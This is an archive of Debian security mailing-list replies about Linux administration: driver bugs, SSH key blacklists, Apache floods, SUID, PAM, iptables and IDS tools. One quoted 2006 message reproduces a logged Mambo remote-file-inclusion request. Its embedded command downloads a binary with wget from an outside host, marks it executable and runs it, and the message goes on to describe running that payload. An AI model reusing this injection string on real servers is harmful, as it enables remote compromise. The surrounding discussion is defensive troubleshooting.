Re: Is oldstable security support duration something to be proud of?

2008-03-10 Thread Michael Loftis 



--On March 10, 2008 4:33:53 PM -0400 Filipus Klutiero <[EMAIL PROTECTED]> 
wrote:




Argh. If I'm asking about a statement, that's because I read it.
Obviously,  the author didn't bother checking whether he was right, which
is why I'm  asking whether there are some people that disagree.


Actually it's you who are mistaken I believe.  Since Sarge has been out 
since about 2005.  That's better than Fedora Core, atleast as good as 
Ubuntu LTS (not to be confused with Ubuntu) and openSUSE.  It's not as good 
as RHEL, but that's not a fair comparison since RHEL is not free.  CentOS 
may be a fair comparison but I don't know their precise policies.





Why do you perceive that
they shouldn't be proud?  Where is your basis that they don't deserve
to be proud?

I already explained this in the bug report.




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Kernel upgrade for 3Ware Driver issues?

2008-04-21 Thread Michael Loftis 
The 2.6.18-6 kernel has a buggy 3w- driver.  Causes data corruption on 
(at least) EM64T w/ 4+GB of RAM.  I'm also pretty sure it's the cause of 
corruption on EM64T systems in 32-bit mode even w/o 4+GB of RAM. 
Specifically it affects 7xxx and 8xxx series cards.






In any event this is a pretty serious bug affecting a pretty large number 
of systems, more than what 3Ware seems to be admitting, so is there any 
plan to issue an update?  I have a number of systems affected by the bug. 
Some I'm holding off upgrading to Debian 4.0 (from 3.1) because the bug 
isn't present in 2.6.8.



--
"Genius might be described as a supreme capacity for getting its possessors
into trouble of all kinds."
-- Samuel Butler


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Kernel upgrade for 3Ware Driver issues?

2008-04-22 Thread Michael Loftis 



--On April 22, 2008 11:21:25 PM +0200 Florian Weimer <[EMAIL PROTECTED]> 
wrote:





I guess the number of systems with amd64 and a 3ware 7xxx/8 PATA
controllers is pretty small, otherwise this bug would have been noticed
earlier.  So the sky is not falling.

Technically, this is not a security bug.


It definitely affects non-64bit systems too, contrary to 3Ware's claims. 
We had corruption on a 32bit system, which is what prompted us to start 
figuring it out.


And I agree, technically it isn't, but security is one of the few ways to 
get updates into the distribution that are NMU.




--
"Genius might be described as a supreme capacity for getting its possessors
into trouble of all kinds."
-- Samuel Butler


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: openssh lockup after blacklist hits

2008-05-20 Thread Michael Loftis 

MaxStartups.

--On May 20, 2008 4:15:33 PM +1000 CaT <[EMAIL PROTECTED]> wrote:


I got connections from an unknown IP to openssh today. openssh logged:

Public key ... blacklisted (see ssh-vulnkey(1))

19 times, each time with a different key and then ssh would not respond
any more and connections to it froze like so:

$ ssh [EMAIL PROTECTED] -v
OpenSSH_4.3p2 Debian-9etch1, OpenSSL 0.9.8c 05 Sep 2006
debug1: Reading configuration data /home/.../.ssh/config
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Applying options for *
debug1: Connecting to ... [...] port 22.
debug1: Connection established.
debug1: identity file /home/.../.ssh/identity type -1
debug1: identity file /home/.../.ssh/id_rsa type 1
debug1: identity file /home/.../.ssh/id_dsa type -1
ssh_exchange_identification: Connection closed by remote host

Admittantly, not running etch2 but there's nothing in the changelog that
deals with this so I don't think that would've helped.

This is running on a 64bit intel box.

--
  "Police noticed some rustling sounds from Linn's bottom area
  and on closer inspection a roll of cash was found protruding
  from Linn's anus, the full amount of cash taken in the robbery."
-
http://www.smh.com.au/news/world/robber-hides-loot-up-his-booty/2008/05/0
9/1210131248617.html


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]





--
"Genius might be described as a supreme capacity for getting its possessors
into trouble of all kinds."
-- Samuel Butler


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [ SPAM! ] [SECURITY] [DSA 1594-1] New imlib2 packages fix arbitrary code execution

2008-06-11 Thread Michael Loftis 



--On June 11, 2008 10:44:02 PM +0200 [EMAIL PROTECTED] wrote:


Bonjour

Je suis absent jusqu'au 16 juin.
Vous pouvez envoyer vos demandes à [EMAIL PROTECTED]


I am out of the office until june the 16th.
You can send your request to [EMAIL PROTECTED]


I'm not sure what is worse here.  The fact the autobot responded to the 
list, or the fact that it responded to something that had been identified 
as SPAM.





--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Mass-updating cached hosts keys afrer ssh security upgrade?

2008-07-21 Thread Michael Loftis 

ssh-keyscan

--On July 21, 2008 6:43:31 PM -0500 JW <[EMAIL PROTECTED]> wrote:


Hello,

In the past several weeks I have applied the openssh/openssl updates to
my  systems - the updates the fix the random-number-generator weakness.

This has turned into an unexpected nightmare: my users have, between them
all,  dozens of cached host keys, and they are nearly unable to work
because every  time they turn around they're getting bad-old-cached-key
warnings (REMOTE  HOST IDENTIFICATION HAS CHANGED).

I've been trying to go through all the known_hosts files manually and
update  them to give my users a break, but it's a tedious nightmare.
Adding to the  complexity is that many of the known_hosts files are
armored (the hostname/ip  address is not in plain text).

Has anyone come up with a way to read all the cached hosts - all the
~/.ssh/known_hosts entries on a system (or at least per user) and fix
them?

Essentially I need some semi-automated way to fix this since I have many
users's connections to fix still (hundreds if not thousands by the time I
do  machines X users X outgoing connections).

Thanks,

JW


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]





--
"Genius might be described as a supreme capacity for getting its possessors
into trouble of all kinds."
-- Samuel Butler


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Apache "DDOS" with random number request

2008-09-21 Thread Michael Loftis 
It sounds liek your app, or a combination of the modules you're using is 
more likely what's running Apache out of memory.  mod_security could be 
used to check for requests that contain just a numeric path to GET, but I'd 
investigate why your app/configuration is causing an OOM error.  Could it 
be you've got MaxClients set too high and the clients are holding 
connections open after the fact?


There are many possibilities at this point, many of which (most) have 
nothing to do with apache but with local configuration and options.


--On September 22, 2008 12:08:39 AM +0200 NeMiX <[EMAIL PROTECTED]> wrote:




Hi there,



since last week we´ve got a little problem with our Webserverfarm.

We get some strange Request from some Dial-Up Accounts from Europe
(T-Online; Telefonica; Orange...):



Sep 21 22:47:35 logger: [Sun Sep 21 22:47:35 2008] [error] [client
87.183.65.xx] Invalid URI in request GET 347905 HTTP/1.0 Sep 21 22:47:35
logger: [Sun Sep 21 22:47:35 2008] [error] [client 87.183.65.xx] Invalid
URI in request GET 341922 HTTP/1.0



This strange Request (GET 347905 HTTP/1.0 ) pass our Firewall (because
it´s normal HTTP), goes to our Load balancer and then to our Webserver.



Only 1 Client make about 80-100 strange Request per Minute and we get a
peak on our Webserverfarm and finally after 5 Minutes the Webserver(s)
get out of memory:



Out of Memory: Kill process 12082 (apache) score 199722 and children.

Out of memory: Killed process 19435 (apache).



If we get a "DDOS" we make a tcpdump and count the IPs (maximum 8 Dial Up
Accounts) to block them on our Firewall.



I don´t find any about this strange request on Google or some security
boards.



Is this a new kind of DDOS or just kiddy stuff? If someone have some more
information about this strange Request/DDOS it would be very nice if he
can send this to me.



Kind Regards



--

Andre Braun, IT Manager



Turtle Entertainment GmbH












--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: antivirus for webserver

2008-10-06 Thread Michael Loftis 
Don't forget about the box, make sure to keep it upgraded regularly as 
security updates come out.  Also make sure to upgrade it to the latest 
distribution of Debian as those come out because older distributions only 
have limited security support, and are eventually dropped altogether from 
security.  Running AV software on a Linux/Unix is generally done to try to 
find virii infecting windows machines being stored on your host.


Also be careful when you're using third party php apps, or even writing 
your own, as those are usually the source of exploits/hacks on Linux 
webservers.  If you can, turn off url_fopen at least, that helps a LOT.


--On October 6, 2008 10:10:33 AM +0200 Laura Arjona Reina 
<[EMAIL PROTECTED]> wrote:



Hello
I have a debian etch webserver, it only has installed
ssh+apache+php+mysql.
It has no GUI.
Nobody sits or connects there to work, only administrators for backing up
and update the system.
I tried to secure it installing and configuring bastille.
Now the only open ports are 22 for ssh and 80 for apache.
We don't need any other service: no DNS, no email server, no ldap, just
webserver.
The connections to mysql are closed from outside, only the webserver can
access mysql databases.

My question is if it is needed to install an antivirus for keeping the
webserver safe. And if it is needed, which antivirus could I use?
I thought about clamav but I read about problems keeping up-to-date the
software shipped with etch-stable.

Thank you

Laura Arjona






--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]







--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: basically security of linux

2009-01-16 Thread Michael Loftis 



--On January 16, 2009 10:31:35 AM +0100 Andreas Matthus 
 wrote:



Hallo,

I manage a lot of debian servers and try to install often the updates.
So I had in mind my systems are well prepaired. (I follow also other
security rules  ;-)  )

But since some days I mull over a question: What happens  if a user run
a selfcopy from a program with a security hole? I'm afraid he can get
root-rights. Isn't it?


In general, no.  This requires an exploitable kernel bug.  That said, there 
have been some of these in the past, and new ones will likely be discovered 
in the future, but that's far more rare.  Anything you run as root should 
only ever come from trusted sources for this reason.


Windows is a different matter.  There's so many ways to break local 
security on windows it's not funny.  But with Linux, and any Unix in 
general, you can not arbitrarily escalate your privileges.  The way 
applications like su, and sudo work is through the SetUID bit on their 
executable.  What this does is causes the kernel to run the application as 
the user that owns the file - root in the case of su and sudo - this lets 
them elevate your privilege levels if you pass their access checks.  That's 
why SetUID executables can be dangerous.  You have to trust them.  Very few 
programs are SetUID 0/root.


Linux/UNIX was designed for running arbitrary programs by arbitrary users, 
and keeping them all separate from eachother, secure from eachother's 
malicious intent or accidents, provided you follow secure permissions on 
files and directories.


root is the only user who has exceptions to this, root has the capability 
to read or write any file (I know i know guys there's SELinux and stuff 
like that for CAP management but we're talking the general case here).




--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: basically security of linux

2009-01-16 Thread Michael Loftis 



--On January 16, 2009 7:29:13 PM +0100 Johannes Wiedersich 
 wrote:



-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Boyd Stephen Smith Jr. wrote:

What about hardlinking the suid-root binaries to a hidden location,
waiting  for a security hole to be found/fixed, and then running the old
binary to  exploit the hole?


This is why compromised systems can't be trusted ever again.  Taht said, 
there are utilities and methods for finding rogue SUID binaries.  Tripwire 
comes to mind, there are many others too.




IIRC, a hard link is the same file called two different names. If
dpkg/apt change the file in one location (security update), the other
one will be changed as well [1]...


That only holds true of edit-in-place.  Something that most packaging 
systems do not do, the reason being is that with the way modern 
systems/kernels execute code, this would modify running code (They 
generally mmap the code, readonly, into the processes address space).


FreeBSD atleast IIRC prevents this, Text File Busy/Text File In Use error. 
However, you can't create a hard link on a file you don't own, you can't do 
it across drives, and I don't think your hardlinked copy retains SUID 
bitsThe last bit I could be wrong though.



You'd have to *copy* the hard linked file, but that would still not
allow you to copy it back later or to retain it's suid properties.

Am I missing something?

Johannes

[1] http://en.wikipedia.org/wiki/Hard_link
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAklw0fkACgkQC1NzPRl9qEXaKACfX8VfBxpZsSH7Lf0HAGC9JL4b
298AoIAqW+BtPtRZ6wZvT37t4zujq3a0
=rOKy
-END PGP SIGNATURE-


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmas...@lists.debian.org





--
"Genius might be described as a supreme capacity for getting its possessors
into trouble of all kinds."
-- Samuel Butler


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: suspicious text alteration

2009-02-03 Thread Michael Loftis 



--On February 3, 2009 6:38:19 PM + li...@aleblanc.cotse.net wrote:


Hi,
   I noticed something very suspicious the other day while using emacs.
   I'm sure I saw a text character on my screen (far from my cursor or
   mouse pointer) change to a different character on it's own.
   I have noticed this a couple of times before in the past, but
   instantly ignored it assuming it was my imagination.

   Here is a list of possibilities I can think of:


Sounds like either bad video ram, or bad ram, or a badly behaved video 
driver.  To rule out bad system ram (or if your ram is shared) use 
memtest86 or memtest86+, for bad video ram, I'm not sure of anything out 
there to test dedicated VRAM.  But if your vram is shared you can try 
physically swapping your DIMMs (Eg move dimm0 to dimm1 and dimm1 to dimm0) 
and testing again.  Another possibility is that you've got something in 
your case shorting the video bits, or a motherboard failure (there's a 
bunch of well documented problems with nvidia and other bga package 
systems).


I highly doubt it's anything security related.



1) I was hallucinating - it was late, but I did not feel tired,
   and double checked myself.
2) Software error - I was using emacs 22.3. and did not have any
   modes running that could do something like that.
3) Harware error - the machine had been running for a long time,
   but is less than one year old. However there is a minor
   problem - when I alter the screen brightness using the fn key
   the brightness indicator that appears is usually garbage.
   Sometimes it appears as normal though.
4) Cosmic rays - I have read that computer memory chips can be
   altered by cosmic ray interference, and that this is not
uncommon:
http://www.newscientist.com/blog/technology/2008/03/do-we-need-cosmic-ray
-alerts-for.html
http://news.bbc.co.uk/2/hi/technology/7335322.stm
5) Hacker/Root kit - could someone disrupt my workflow by
   installing a rootkit which subtly alters text? or maybe a
   hacker is doing it directly? I did have an SVN server & SSH
   server connected to the internet, and frequently used instant
   messaging with people I don't know very well.

Can anyone give me advice? Am I being too paranoid? too relaxed?
Has anyone else had the same problem or heard/read about it?

--
aleblanc


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmas...@lists.debian.org





--
"Genius might be described as a supreme capacity for getting its possessors
into trouble of all kinds."
-- Samuel Butler


--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: Missing mail.log files

2009-03-31 Thread Michael Loftis 



--On March 31, 2009 10:09:37 AM +0200 "Giacomo A. Catenazzi" 
 wrote:




Consider also that there are different loggers, different way to
implement logs and not a right way to do it, so it is really possible to
have non-optimal log-rotation scripts.
I don't use postfix, so I did not investigate if there are bugs.


In debian, nothing logs directly to /var/log/mail.log, everything comes in 
via syslog, so only syslogd ever has the file open for writing.  Log 
rotation is controlled IIRC by savelog hich controls ALL rotation of all 
logs for syslogd logs, so i there was a bug in that he should be missing 
chunks from everything.


The (most) likely explanation is running out of disk space in /var, 
followed by someone (accidentally or not) removing the logs, followed (very 
distantly) by some new bug in the log rotation scripts.  I haven't checked 
any of my deb5 machines yet, but I've never seen this happen with deb4. 
Though running out of space in /var would possibly result in missing other 
logs too.  I don't think it was mentioned if the log.N's are sequential or 
not.  Or if he has compression in use on them or not.





--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Re: non-executable stack (via PT_GNU_STACK) not being enforced

2010-10-10 Thread Michael Loftis 



--On Sunday, October 10, 2010 9:53 AM -0400 Brchk05  wrote:





I am running Debian 2.6.26-21lenny4 and I am puzzled by an issue with the
enforcement of page permissions.  I have written a simple program with a
basic buffer overflow and compiled two versions using gcc: one with -z
execstack and another with -z noexecstack.





I could be wrong as I haven't looked at the whole NX/XD thing in detail, 
been a while since I've actively done anything of the sort, but, it would 
seem to me smashing is not the same as executing on the stack necessarily. 
Overwriting/changing returns on the stack via a smash, or clobbering code 
via a smash won't be affected by non executable stack, since that's just 
changing stack variables, now if your code section is also non-writable, 
and your heap is non-executable, you're further protected but you can still 
do a  return to libc attack.  Wikipedia talks about this 





--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/2ccc3b7fe7647c824eb6f...@[192.168.1.68]

Re: Any Account Logs In With Any Password

2010-10-25 Thread Michael Loftis 
Depends on your full stack, but yes, this is the PAM behavior as checks 
prior to this indicate a soft success.  If you remove authentication from 
your system, its expected that any attempt to access will pass, barring and 
specific denial.


--On Monday, October 25, 2010 17:16 -0400 Brad Tilley  
wrote:



While experimenting with PCI DSS on a default Debian Linux system, I
found that when I comment out this line:

authrequiredpam_unix.so nullok_secure

in /etc/pam.d/common-auth, any account may ssh into the box by typing
anything as the password. Is this the desired behavior? I would think
that it would fail by default.



--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact
listmas...@lists.debian.org Archive:
http://lists.debian.org/4cc5f3c3.5020...@vt.edu







--
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/85db4032fbdb47dbec79c...@[192.168.1.66]

security.debian.org mirrors?

2005-09-21 Thread Michael Loftis 
Are there any official mirrors yet?  Esp. mirrors that allow rsync? 
security.debian.org h as been abysmally slow for atleast a month here and 
so I'm now forced to setup a local mirror, except I can't rsync the main 
mirror at all (max connections limit error message).


Any suggestions?  Yes I searched the archives and can't find anything 
relevant.  I know that atleast in the past creating ones own mirrors was/is 
frowned upon but since the security team doesn't seem to be moving in that 
direction I need to.


TIA all,


--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Strange Apache log and mambo security - sexy executable

2006-01-23 Thread Michael Loftis 



--On January 23, 2006 8:31:40 AM +0100 Maik Holtkamp 
<[EMAIL PROTECTED]> wrote:



-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

yesterday morning I found a strange entry in my apache log files (debian
sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
Server, just serving my Family and some good friends (normally).

- ---cut---
132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&
mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%
20212.20
3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20
YYY;echo|  HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)" - ---cut---

As I patched mambo against recent "register global" attack and my /tmp
is mount noexec, the attack doesn't exploit anything.

However, I curiously downloaded this sexy executable to have a closer
look.

- ---cut---
backup:/home/qmb# ./sexy -h
./sexy  
- ---cut---


Firstly, don't ever download and run untrusted code as root, especially 
when it's obviously an exploit attempt, unless you run it on an unconnected 
box you're prepared to scrap afterwards.  God knows what the code will do 
to your system.


This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
used to make rsync backups of LAN hosts to usb hds.

Unfortunately, I was that curious, that I decided to strace it (in spite
I hardly understand strace):

- ---cut---
backup:/home/qmb# strace ./sexy
execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
uname({sys="Linux", node="backup", ...}) = 0
brk(0)  = 0x804a000
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7f13000
access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
directory)
open("/etc/ld.so.preload", O_RDONLY)= -1 ENOENT (No such file or
directory)
open("/etc/ld.so.cache", O_RDONLY)  = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
close(3)= 0
access("/etc/ld.so.nohwcap", F_OK)  = -1 ENOENT (No such file or
directory)
open("/lib/tls/libc.so.6", O_RDONLY)= 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xb7dd6000 old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED, 3, 0x129000) = 0xb7f0
old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
close(3)= 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7dd5000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xb7f0b000, 30780)   = 0
fork()  = 11935
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7f12000
write(1, "./sexy  \n", 21./sexy  
)  = 21
munmap(0xb7f12000, 4096)= 0
exit_group(2)   = ?
- ---cut---

After this run the box was hardly damaged:

- - It insists on bringing its NIC to promiscuous mode
- - ls, grep, gunzip (probably others, too) just give a segmentation
  fault

I tried to investigate further:

- - tcpdump doesn't show any traffic in the net that shouldn't be there
- - ps ax listed only known processes, all where found in /proc, too
- - Top doesn't show anything strange
- - netstat -tulpen doesn't list any ports listening

Trying rebooting failed totally. It tried to run a lot of grep processes
that didn't run etc.

It took me 2 hours to return to a normal state with this box (booting
knoppix, backup of corrupted /var, blanking the disc, restoring the
backup of the night before).

In spite I am not that familiar with strace and no coder, I suppose that
the program "sexy" damaged the linker (open ld.so.cache) and would have
tried to open a ptty on the IP/port given on the command line (As I did
not give any command line arguments, this failed). Probably the guy/bot
on the other end would have exchanged some libs in this session to
install the real rootkit on the box.

Right?


Not having the binary and not really having time to look at it, it's 
probably just straight up attempting to infect your machine, and that it 
very clearly succeeded in doing.  It didn't however succeed in hiding 
itself, as evidenced by your segfaults.  You're probably running a litle 
different target OS than 'sexy' was built for.




Though I already invested some time (restoring the host backup), I would
be pleased to understand what happened more detailed so any clue is
appreciated.

If somebody

Re: PaX on Debian

2006-01-26 Thread Michael Loftis 



--On January 26, 2006 11:03:55 AM +0100 "Martin G.H. Minkler" 
<[EMAIL PROTECTED]> wrote:



[EMAIL PROTECTED] wrote:


Can everbody tell me where I can download PaX patch for debian kernel?


Maybe look into a bigger / more complete solution such as
http://www.grsecurity.net or SELinux?

grsecurity is highly configurable, just use the PaX features if You like



I'd definitely second that opinion.  GRSec is the successor to PaX I 
*think* anyway.  SELinux can be a bit daunting to do a 'full' setup though.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Using multicast for security updates

2006-02-23 Thread Michael Loftis 
Good idea except this requires large scale rollout of mutlicast, which 
AFAIK, hasn't happened.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Bonk vulnerability!

2006-03-03 Thread Michael Loftis 



--On March 3, 2006 10:01:54 AM -0800 Zakai Kinan <[EMAIL PROTECTED]> 
wrote:



I just installed a server with sarge 3.1 and after
testing it with nessus it is vulnerable to bonk.  I am
trying to figure out how that is possible and how to
fix it?  My other servers are not vulnerable to bonk.
I run a debian shop.


Thanks for any insight,



I've no idea WTF 'bonk' is, having never heard of it before, but I'll bet 
it's a badly written nessus plugin or just a plugin that's false 
positive-ing.




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Bonk vulnerability!

2006-03-03 Thread Michael Loftis 



--On March 3, 2006 1:55:14 PM -0800 Zakai Kinan <[EMAIL PROTECTED]> 
wrote:



Oh, that is cute.  Bonk is similar to teardrop.  I was
able to use nessus plugin to crash the sarge 3.1
server.


Did it actually crash or did nessus just report one?  If it crashed what 
was the Ooops onscreen?  This is dubious at best since I'm not aware of any 
variant of Linux that is susceptible to this attack, and no box I've got 
here is (3.0, 3.1, RH, SuSE)


If your machine is crashing it's probably completely unrelated to 'bonk' 
and is either a driver issue or hardware issue.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: howto block ssh brute-force

2006-03-12 Thread Michael Loftis 
The only thing I can say is be *VERY* careful on a busy Linux box. 
iptables sucks.  It's sequential, meaning every entry in a list has to be 
processed.  Your best bet is to first match TCP SYN packets and jump to 
another separate chain ONLY for the SYN packets, then do your deny's there, 
and do stateful accept.  State gets processed before the rest of the FW 
code, and statefully established sessions are in hash structures/radix 
lookup rather than a linked list.  If the box does any sort of traffic or 
gets even a half-decent number of attacks you're pretty quickly find out 
that if you get a few hundred rules lines up the amount of CPU time spent 
per packet w/o these little tweaks is very high.


--On March 12, 2006 4:50:51 AM -0300 Felipe Figueiredo <[EMAIL PROTECTED]> 
wrote:



Hello,

once in a while (say, every two weeks) I get a brute-force
login/password scan attempt in my server (i.e., a single ip tries
dictionary account names and passwords at random). SSH access is
needed by many users, and  (RSA/DSA key)-only access is, at present
time, unwanted. So far none such attempt was lucky (to my knowlege),
but it always gives me creeps when I see unusually big logwatch
reports, and my contacts to sysadmins of originating networks are
usually ignored.

Any ideas?

Maybe there is a way to temporarily block ips upon such attempts (is
this a FAQ?), or maybe divert them like what portsentry does for
portscans?







--
Michael Loftis
Modwest Operations Manager
Powerful, Affordable Web Hosting


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: howto block ssh brute-force

2006-03-12 Thread Michael Loftis 



--On March 12, 2006 2:29:09 PM +0100 martin f krafft <[EMAIL PROTECTED]> 
wrote:



also sprach Michael Loftis <[EMAIL PROTECTED]> [2006.03.12.1159 +0100]:

The only thing I can say is be *VERY* careful on a busy Linux box.
iptables sucks. It's sequential, meaning every entry in a list has to be
processed.


This is not the case. You can branch iptables rulesets to arbitrary
complexity. In fact, I often wanted Firewall-1 to have a similar
feature. Firewall-1 scales pretty damn well (4 Gbps throughput,
stateful), but in my experience, iptables can handle way more.


Yes you can make arbitrarily deep jumps/chains, but any single list is 
still processed sequentially.  Once could probably implement scripting to 
produce a sort of binary tree on hashes/jumps to chains.  Fact is it does 
not do long lists well at all because they are processed sequentially, 
unless this has changed for 2.6.


I'd love to see a Linux box capable of 4Gbps throughput but somehow I 
really doubt this as being possible without a LOT more work, and some 
pretty trick hardware.


Linux iptables definitely has more flexibility than anything else out there 
right now, I'll certainly give it that hands down.  Long lists thoguh 
(atleast in 2.4) and it falls flat.  We once tried doing blocking on the 
mail servers for dictionary attempts and some other nasties on SMTP, but 
that didn't last long mostly because even just jumping to process SYN 
packets on the list it still ate up a lot of the system's horsepower. 
These lists were pretty long (1500-2000 hosts) but still.




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [SECURITY] [DSA 1020-1] New flex packages fix insecure code generation

2006-03-27 Thread Michael Loftis 
Ouchis anyone anywhere beginning to do an audit of other packages to 
find out whats affected by this?



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: recent kernel vulnerabilities - debian specific?

2006-03-29 Thread Michael Loftis 



--On March 29, 2006 10:19:30 AM +0200 Frank Van Damme 
<[EMAIL PROTECTED]> wrote:



Hello,

I have a question about the recent vulnerabilities in
kernel-source-2.6.8. I would like to know if these bugs were specific
to Debian and, if not, which versions of the (vanilla) kernel are
vulnerable. All references to current mainline kernel security
problems are welcome. Thanks in advance.


This is why they list CVE information, go look at http://cve.mitre.org/ and 
by getting the various CVEs related to the debian security update you'll 
find your answers.  Yes, it is NOT debian specific, the kernel isn't debian 
specific.



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: IDS for a non-well-known protocol?

2006-04-10 Thread Michael Loftis 



--On April 10, 2006 10:39:18 AM +0200 Lezgin Bakircioglu 
<[EMAIL PROTECTED]> wrote:



Greetings to everybody in the security scene.
I have a question around the area IDS.
I am in a difficult situation, i need a IDS that shall support a
non-well-known protocol, is there any tip on any good IDS that is easy to
dev a understanding for this protocol?


I'm not sure what you're asking entirely but if I read your question right 
I think you want an IDS at all, you just want a packet sniffer, like 
ethereal/tethereal or even tcpdump so you can develop an understanding of 
whats going over the wire with the protocol you're looking at?  If you aim 
to create signatures/etc to trigger alarms or log entries then IDS *might* 
sort of be what you're looking for.


If it really is IDS (Intrusion Detection System) you're looking for it 
depends on what type/level of IDS.  A popular approach is to use a packet 
sniffing based IDS such as Snort, another approach is to setup honeypots 
using say honeyd/honeynet.


SNORT's site has lots of good guides on how to set it up.


Any good docs/howto or guides?
I have look t little in to snort and my thoughts is to using that, a
little complicated doc in this area but should be possible..
Any good community's tip?


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
